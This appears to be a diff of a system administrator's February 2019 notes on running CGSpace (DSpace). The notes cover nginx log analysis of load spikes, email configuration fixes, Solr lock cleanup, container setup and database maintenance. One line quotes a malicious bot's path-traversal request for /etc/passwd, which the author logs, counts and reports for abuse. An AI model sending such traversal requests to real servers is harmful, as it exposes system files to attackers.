<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;06/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
689 35.237.175.180
1236 5.9.6.51
1305 34.218.226.147
@ -368,7 +368,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>Looking closer at the top users, I see <code>45.5.186.2</code> is in Brazil and was making over 100 requests per minute to the REST API:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E '06/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E &#39;06/Feb/2019:0[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 10
118 06/Feb/2019:05:46
119 06/Feb/2019:05:37
119 06/Feb/2019:05:47
@ -382,7 +382,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>I was thinking of rate limiting those because I assumed most of them would be errors, but actually most are HTTP 200 OK!</li>
</ul>
<pre><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '06/Feb/2019' | grep 45.5.186.2 | awk '{print $9}' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#39;06/Feb/2019&#39; | grep 45.5.186.2 | awk &#39;{print $9}&#39; | sort | uniq -c
10411 200
1 301
7 302
@ -392,7 +392,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>I should probably start looking at the top IPs for web (XMLUI) and for API (REST and OAI) separately:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;06/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
328 220.247.212.35
372 66.249.66.221
380 207.46.13.2
@ -403,7 +403,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
1236 5.9.6.51
1554 66.249.66.219
4942 85.25.237.71
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;06/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
10 66.249.66.221
26 66.249.66.219
69 5.143.231.8
@ -419,7 +419,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
<li>Linode sent an alert last night that the load on CGSpace (linode18) was over 300%</li>
<li>Here are the top IPs in the web server and API logs before, during, and after that time, respectively:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;06/Feb/2019:(17|18|19|20|23)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;06/Feb/2019:(17|18|19|20|23)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
5 66.249.66.209
6 2a01:4f8:210:51ef::2
6 40.77.167.75
@ -430,7 +430,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
20 95.108.181.88
27 66.249.66.219
2381 45.5.186.2
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;06/Feb/2019:(17|18|19|20|23)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Feb/2019:(17|18|19|20|23)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
455 45.5.186.2
506 40.77.167.75
559 54.70.40.11
@ -444,7 +444,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>Then again this morning another alert:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;07/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;07/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
5 66.249.66.223
8 104.198.9.108
13 110.54.160.222
@ -455,7 +455,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
4529 45.5.186.2
4661 205.186.128.185
4661 70.32.83.92
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;07/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;07/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
145 157.55.39.237
154 66.249.66.221
214 34.218.226.147
@ -471,7 +471,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
<li>I could probably rate limit the REST API, or maybe just keep increasing the alert threshold so I don&rsquo;t get alert spam (this is probably the correct approach because it seems like the REST API can keep up with the requests and is returning HTTP 200 status as far as I can tell)</li>
<li>Bosede from IITA sent a message that a colleague is having problems submitting to some collections in their community:</li>
</ul>
<pre><code>Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1056 by user 1759
<pre tabindex="0"><code>Authorization denied for action WORKFLOW_STEP_1 on COLLECTION:1056 by user 1759
</code></pre><ul>
<li>Collection 1056 appears to be <a href="https://cgspace.cgiar.org/handle/10568/68741">IITA Posters and Presentations</a> and I see that its workflow step 1 (Accept/Reject) is empty:</li>
</ul>
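<ul>
<li>To double-check which collection an internal ID like 1056 refers to, the REST API can resolve it directly (a quick sketch of the lookup, using the same endpoint I use for collection 1021 further down):</li>
</ul>
<pre tabindex="0"><code>$ curl -s -H &#39;Accept: application/json&#39; &#39;https://cgspace.cgiar.org/rest/collections/1056&#39;
</code></pre>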
@ -482,7 +482,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
<li>Bizuwork asked about the &ldquo;DSpace Submission Approved and Archived&rdquo; emails that stopped working last month</li>
<li>I tried the <code>test-email</code> command on DSpace and it indeed is not working:</li>
</ul>
<pre><code>$ dspace test-email
<pre tabindex="0"><code>$ dspace test-email
About to send test email:
- To: aorth@mjanja.ch
@ -503,7 +503,7 @@ Please see the DSpace documentation for assistance.
<ul>
<li>I re-configured CGSpace to use the email/password for cgspace-support, but I get this error when I try the <code>test-email</code> script:</li>
</ul>
<pre><code>Error sending email:
<pre tabindex="0"><code>Error sending email:
- Error: com.sun.mail.smtp.SMTPSendFailedException: 530 5.7.57 SMTP; Client was not authenticated to send anonymous mail during MAIL FROM [AM6PR10CA0028.EURPRD10.PROD.OUTLOOK.COM]
</code></pre><ul>
<li>I tried to log into Outlook 365 with the credentials but I think the ones I have must be wrong, so I will ask ICT to reset the password</li>
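<li>In the meantime, a quick way to confirm that the SMTP endpoint itself accepts STARTTLS, independent of DSpace, is something like the following (the hostname here is the generic Office 365 one and might not match our exact mail configuration; it only checks the connection, not the credentials):</li>
</ul>
<pre tabindex="0"><code>$ openssl s_client -connect smtp.office365.com:587 -starttls smtp
</code></pre><ul>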
@ -513,7 +513,7 @@ Please see the DSpace documentation for assistance.
<li>Linode sent alerts about CPU load yesterday morning, yesterday night, and this morning! All over 300% CPU load!</li>
<li>This is just for this morning:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;09/Feb/2019:(07|08|09|10|11)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;09/Feb/2019:(07|08|09|10|11)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
289 35.237.175.180
290 66.249.66.221
296 18.195.78.144
@ -524,7 +524,7 @@ Please see the DSpace documentation for assistance.
742 5.143.231.38
1046 5.9.6.51
1331 66.249.66.219
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;09/Feb/2019:(07|08|09|10|11)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;09/Feb/2019:(07|08|09|10|11)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
4 66.249.83.30
5 49.149.10.16
8 207.46.13.64
@ -539,7 +539,7 @@ Please see the DSpace documentation for assistance.
<li>I know 66.249.66.219 is Google, 5.9.6.51 is MegaIndex, and 5.143.231.38 is SputnikBot</li>
<li>Ooh, but 151.80.203.180 is some malicious bot making requests for <code>/etc/passwd</code> like this:</li>
</ul>
<pre><code>/bitstream/handle/10568/68981/Identifying%20benefit%20flows%20studies%20on%20the%20potential%20monetary%20and%20non%20monetary%20benefits%20arising%20from%20the%20International%20Treaty%20on%20Plant%20Genetic_1671.pdf?sequence=1&amp;amp;isAllowed=../etc/passwd
<pre tabindex="0"><code>/bitstream/handle/10568/68981/Identifying%20benefit%20flows%20studies%20on%20the%20potential%20monetary%20and%20non%20monetary%20benefits%20arising%20from%20the%20International%20Treaty%20on%20Plant%20Genetic_1671.pdf?sequence=1&amp;amp;isAllowed=../etc/passwd
</code></pre><ul>
<li>151.80.203.180 is on OVH so I sent a message to their abuse email&hellip;</li>
</ul>
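<ul>
<li>Out of curiosity, a rough count of how many of these <code>/etc/passwd</code> probes hit us recently (a throwaway one-liner, nothing scientific):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -c &#39;etc/passwd&#39;
</code></pre>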
@ -547,7 +547,7 @@ Please see the DSpace documentation for assistance.
<ul>
<li>Linode sent another alert about CGSpace (linode18) CPU load this morning, here are the top IPs in the web server XMLUI and API logs before, during, and after that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
232 18.195.78.144
238 35.237.175.180
281 66.249.66.221
@ -558,7 +558,7 @@ Please see the DSpace documentation for assistance.
444 2a01:4f8:140:3192::2
1171 5.9.6.51
1196 66.249.66.219
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
6 112.203.241.69
7 157.55.39.149
9 40.77.167.178
@ -572,16 +572,16 @@ Please see the DSpace documentation for assistance.
</code></pre><ul>
<li>Another interesting thing might be the total number of requests for web and API services during that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE &quot;10/Feb/2019:0(5|6|7|8|9)&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE &#34;10/Feb/2019:0(5|6|7|8|9)&#34;
16333
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE &quot;10/Feb/2019:0(5|6|7|8|9)&quot;
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE &#34;10/Feb/2019:0(5|6|7|8|9)&#34;
15964
</code></pre><ul>
<li>Also, the number of unique IPs served during that time:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1622
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
95
</code></pre><ul>
<li>It&rsquo;s very clear to me now that the API requests are the heaviest!</li>
@ -610,7 +610,7 @@ Please see the DSpace documentation for assistance.
</ul>
</li>
</ul>
<pre><code>Error sending email:
<pre tabindex="0"><code>Error sending email:
- Error: cannot test email because mail.server.disabled is set to true
</code></pre><ul>
<li>I&rsquo;m not sure why I didn&rsquo;t know about this configuration option before, and always maintained multiple configurations for development and production
@ -620,7 +620,7 @@ Please see the DSpace documentation for assistance.
</li>
<li>I updated my local Sonatype nexus Docker image and had an issue with the volume for some reason so I decided to just start from scratch:</li>
</ul>
<pre><code># docker rm nexus
<pre tabindex="0"><code># docker rm nexus
# docker pull sonatype/nexus3
# mkdir -p /home/aorth/.local/lib/containers/volumes/nexus_data
# chown 200:200 /home/aorth/.local/lib/containers/volumes/nexus_data
@ -628,7 +628,7 @@ Please see the DSpace documentation for assistance.
</code></pre><ul>
<li>For some reason my <code>mvn package</code> for DSpace is not working now&hellip; I might go back to <a href="https://mjanja.ch/2018/02/cache-maven-artifacts-with-artifactory/">using Artifactory for caching</a> instead:</li>
</ul>
<pre><code># docker pull docker.bintray.io/jfrog/artifactory-oss:latest
<pre tabindex="0"><code># docker pull docker.bintray.io/jfrog/artifactory-oss:latest
# mkdir -p /home/aorth/.local/lib/containers/volumes/artifactory5_data
# chown 1030 /home/aorth/.local/lib/containers/volumes/artifactory5_data
# docker run --name artifactory --network dspace-build -d -v /home/aorth/.local/lib/containers/volumes/artifactory5_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss
@ -643,13 +643,13 @@ Please see the DSpace documentation for assistance.
<li>On a similar note, I wonder if we could use the performance-focused <a href="https://libvips.github.io/libvips/">libvips</a> and the third-party <a href="https://github.com/codecitizen/jlibvips/">jlibvips Java library</a> in DSpace</li>
<li>Testing the <code>vipsthumbnail</code> command line tool with <a href="https://cgspace.cgiar.org/handle/10568/51999">this CGSpace item that uses CMYK</a>:</li>
</ul>
<pre><code>$ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o '%s.jpg[Q=92,optimize_coding,strip]'
<pre tabindex="0"><code>$ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o &#39;%s.jpg[Q=92,optimize_coding,strip]&#39;
</code></pre><ul>
<li>(DSpace 5 appears to use JPEG 92 quality so I do the same)</li>
<li>Thinking about making &ldquo;top items&rdquo; endpoints in my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a></li>
<li>I could use the following SQL queries very easily to get the top items by views or downloads:</li>
</ul>
<pre><code>dspacestatistics=# SELECT * FROM items WHERE views &gt; 0 ORDER BY views DESC LIMIT 10;
<pre tabindex="0"><code>dspacestatistics=# SELECT * FROM items WHERE views &gt; 0 ORDER BY views DESC LIMIT 10;
dspacestatistics=# SELECT * FROM items WHERE downloads &gt; 0 ORDER BY downloads DESC LIMIT 10;
</code></pre><ul>
<li>I&rsquo;d have to think about what to make the REST API endpoints, perhaps: <code>/statistics/top/items?limit=10</code></li>
@ -660,7 +660,7 @@ dspacestatistics=# SELECT * FROM items WHERE downloads &gt; 0 ORDER BY downloads
</ul>
</li>
</ul>
<pre><code>$ identify -verbose alc_contrastes_desafios.pdf.jpg
<pre tabindex="0"><code>$ identify -verbose alc_contrastes_desafios.pdf.jpg
...
Colorspace: sRGB
</code></pre><ul>
@ -671,35 +671,35 @@ dspacestatistics=# SELECT * FROM items WHERE downloads &gt; 0 ORDER BY downloads
<li>ILRI ICT reset the password for the CGSpace mail account, but I still can&rsquo;t get it to send mail from DSpace&rsquo;s <code>test-email</code> utility</li>
<li>I even added extra mail properties to <code>dspace.cfg</code> as suggested by someone on the dspace-tech mailing list:</li>
</ul>
<pre><code>mail.extraproperties = mail.smtp.starttls.required = true, mail.smtp.auth=true
<pre tabindex="0"><code>mail.extraproperties = mail.smtp.starttls.required = true, mail.smtp.auth=true
</code></pre><ul>
<li>But the result is still:</li>
</ul>
<pre><code>Error sending email:
<pre tabindex="0"><code>Error sending email:
- Error: com.sun.mail.smtp.SMTPSendFailedException: 530 5.7.57 SMTP; Client was not authenticated to send anonymous mail during MAIL FROM [AM6PR06CA0001.eurprd06.prod.outlook.com]
</code></pre><ul>
<li>I tried to log into the Outlook 365 web mail and it doesn&rsquo;t work so I&rsquo;ve emailed ILRI ICT again</li>
<li>After reading the <a href="https://javaee.github.io/javamail/FAQ#commonmistakes">common mistakes in the JavaMail FAQ</a> I reconfigured the extra properties in DSpace&rsquo;s mail configuration to be simply:</li>
</ul>
<pre><code>mail.extraproperties = mail.smtp.starttls.enable=true
<pre tabindex="0"><code>mail.extraproperties = mail.smtp.starttls.enable=true
</code></pre><ul>
<li>&hellip; and then I was able to send a mail using my personal account where I know the credentials work</li>
<li>The CGSpace account still gets this error message:</li>
</ul>
<pre><code>Error sending email:
<pre tabindex="0"><code>Error sending email:
- Error: javax.mail.AuthenticationFailedException
</code></pre><ul>
<li>I updated the <a href="https://github.com/ilri/DSpace/pull/410">DSpace SMTP settings in <code>dspace.cfg</code></a> as well as the <a href="https://github.com/ilri/rmg-ansible-public/commit/ab5fe4d10e16413cd04ffb1bc3179dc970d6d47c">variables in the DSpace role of the Ansible infrastructure scripts</a></li>
<li>Thierry from CTA is having issues with his account on DSpace Test, and there is no admin password reset function on DSpace (only via email, which is disabled on DSpace Test), so I have to delete and re-create his account:</li>
</ul>
<pre><code>$ dspace user --delete --email blah@cta.int
$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password 'blah'
<pre tabindex="0"><code>$ dspace user --delete --email blah@cta.int
$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password &#39;blah&#39;
</code></pre><ul>
<li>On this note, I saw a thread on the dspace-tech mailing list that says this functionality exists if you enable <code>webui.user.assumelogin = true</code></li>
<li>I will enable this on CGSpace (<a href="https://github.com/ilri/DSpace/pull/411">#411</a>)</li>
<li>Test re-creating my local PostgreSQL and Artifactory containers with podman instead of Docker (using the volumes from my old Docker containers though):</li>
</ul>
<pre><code># podman pull postgres:9.6-alpine
<pre tabindex="0"><code># podman pull postgres:9.6-alpine
# podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
# podman pull docker.bintray.io/jfrog/artifactory-oss
# podman run --name artifactory -d -v /home/aorth/.local/lib/containers/volumes/artifactory5_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss
@ -707,7 +707,7 @@ $ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int
<li>Totally works&hellip; awesome!</li>
<li>Then I tried with rootless containers by creating the subuid and subgid mappings for aorth:</li>
</ul>
<pre><code>$ sudo touch /etc/subuid /etc/subgid
<pre tabindex="0"><code>$ sudo touch /etc/subuid /etc/subgid
$ usermod --add-subuids 10000-75535 aorth
$ usermod --add-subgids 10000-75535 aorth
$ sudo sysctl kernel.unprivileged_userns_clone=1
@ -717,7 +717,7 @@ $ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspace
<li>Which totally works, but Podman&rsquo;s rootless support doesn&rsquo;t work with port mappings yet&hellip;</li>
<li>Deploy the Tomcat-7-from-tarball branch on CGSpace (linode18), but first stop the Ubuntu Tomcat 7 and do some basic prep before running the Ansible playbook:</li>
</ul>
<pre><code># systemctl stop tomcat7
<pre tabindex="0"><code># systemctl stop tomcat7
# apt remove tomcat7 tomcat7-admin
# useradd -m -r -s /bin/bash dspace
# mv /usr/share/tomcat7/.m2 /home/dspace
@ -728,14 +728,14 @@ $ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspace
</code></pre><ul>
<li>After running the playbook CGSpace came back up, but I had an issue with some Solr cores not being loaded (similar to last month) and this was in the Solr log:</li>
</ul>
<pre><code>2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
<pre tabindex="0"><code>2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2018&#39;: Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
</code></pre><ul>
<li>The issue last month was address space, which is now set as <code>LimitAS=infinity</code> in <code>tomcat7.service</code>&hellip;</li>
<li>I re-ran the Ansible playbook to make sure all configs etc were up to date, then rebooted the server</li>
<li>Still the error persists after reboot</li>
<li>I will try to stop Tomcat and then remove the locks manually:</li>
</ul>
<pre><code># find /home/cgspace.cgiar.org/solr/ -iname &quot;write.lock&quot; -delete
<pre tabindex="0"><code># find /home/cgspace.cgiar.org/solr/ -iname &#34;write.lock&#34; -delete
</code></pre><ul>
<li>After restarting Tomcat the usage statistics are back</li>
<li>Interestingly, many of the locks were from last month, last year, and even 2015! I&rsquo;m pretty sure that&rsquo;s not supposed to be how locks work&hellip;</li>
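<li>Next time it might be worth listing the locks with their modification times before deleting them, for example with GNU find (just a sketch):</li>
</ul>
<pre tabindex="0"><code># find /home/cgspace.cgiar.org/solr/ -iname &#34;write.lock&#34; -printf &#39;%TY-%Tm-%Td %p\n&#39; | sort
</code></pre>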
@ -747,19 +747,19 @@ $ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspace
<ul>
<li>Tomcat was killed around 3AM by the kernel&rsquo;s OOM killer according to <code>dmesg</code>:</li>
</ul>
<pre><code>[Fri Feb 15 03:10:42 2019] Out of memory: Kill process 12027 (java) score 670 or sacrifice child
<pre tabindex="0"><code>[Fri Feb 15 03:10:42 2019] Out of memory: Kill process 12027 (java) score 670 or sacrifice child
[Fri Feb 15 03:10:42 2019] Killed process 12027 (java) total-vm:14108048kB, anon-rss:5450284kB, file-rss:0kB, shmem-rss:0kB
[Fri Feb 15 03:10:43 2019] oom_reaper: reaped process 12027 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
</code></pre><ul>
<li>The <code>tomcat7</code> service shows:</li>
</ul>
<pre><code>Feb 15 03:10:44 linode19 systemd[1]: tomcat7.service: Main process exited, code=killed, status=9/KILL
<pre tabindex="0"><code>Feb 15 03:10:44 linode19 systemd[1]: tomcat7.service: Main process exited, code=killed, status=9/KILL
</code></pre><ul>
<li>I suspect it was related to the media-filter cron job that runs at 3AM but I don&rsquo;t see anything particular in the log files</li>
<li>I want to try to normalize the <code>text_lang</code> values to make working with metadata easier</li>
<li>We currently have a bunch of weird values that DSpace uses like <code>NULL</code>, <code>en_US</code>, and <code>en</code> and others that have been entered manually by editors:</li>
</ul>
<pre><code>dspace=# SELECT DISTINCT text_lang, count(*) FROM metadatavalue WHERE resource_type_id=2 GROUP BY text_lang ORDER BY count DESC;
<pre tabindex="0"><code>dspace=# SELECT DISTINCT text_lang, count(*) FROM metadatavalue WHERE resource_type_id=2 GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
| 1069539
@ -778,7 +778,7 @@ $ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspace
<li>Theoretically this field could help if you wanted to search for Spanish-language fields in the API or something, but even for the English fields there are two different values (and those are from DSpace itself)!</li>
<li>I&rsquo;m going to normalize these to <code>NULL</code> at least on DSpace Test for now:</li>
</ul>
<pre><code>dspace=# UPDATE metadatavalue SET text_lang = NULL WHERE resource_type_id=2 AND text_lang IS NOT NULL;
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang = NULL WHERE resource_type_id=2 AND text_lang IS NOT NULL;
UPDATE 1045410
</code></pre><ul>
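<li>To verify, re-running the distinct query from above should now show only the NULL row (the connection parameters here are just illustrative):</li>
</ul>
<pre tabindex="0"><code>$ psql -h localhost -U dspace dspace -c &#39;SELECT DISTINCT text_lang, count(*) FROM metadatavalue WHERE resource_type_id=2 GROUP BY text_lang;&#39;
</code></pre><ul>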
<li>I started proofing IITA&rsquo;s 2019-01 records that Sisay uploaded this week
@ -790,20 +790,20 @@ UPDATE 1045410
<li>ILRI ICT fixed the password for the CGSpace support email account and I tested it on Outlook 365 web and DSpace and it works</li>
<li>Re-create my local PostgreSQL container for the new PostgreSQL version and to use podman&rsquo;s volumes:</li>
</ul>
<pre><code>$ podman pull postgres:9.6-alpine
<pre tabindex="0"><code>$ podman pull postgres:9.6-alpine
$ podman volume create dspacedb_data
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost dspace_2019-02-11.backup
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
</code></pre><ul>
<li>And it&rsquo;s all running without root!</li>
<li>Then re-create my Artifactory container as well, taking into account ulimit open file requirements by Artifactory as well as the user limitations caused by rootless subuid mappings:</li>
</ul>
<pre><code>$ podman volume create artifactory_data
<pre tabindex="0"><code>$ podman volume create artifactory_data
artifactory_data
$ podman create --ulimit nofile=32000:32000 --name artifactory -v artifactory_data:/var/opt/jfrog/artifactory -p 8081:8081 docker.bintray.io/jfrog/artifactory-oss
$ buildah unshare
@ -817,13 +817,13 @@ $ podman start artifactory
<ul>
<li>I ran DSpace&rsquo;s cleanup task on CGSpace (linode18) and there were errors:</li>
</ul>
<pre><code>$ dspace cleanup -v
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(162844) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>$ dspace cleanup -v
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(162844) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);&#39;
UPDATE 1
</code></pre><ul>
<li>I merged the Atmire Metadata Quality Module (MQM) changes to the <code>5_x-prod</code> branch and deployed it on CGSpace (<a href="https://github.com/ilri/DSpace/pull/407">#407</a>)</li>
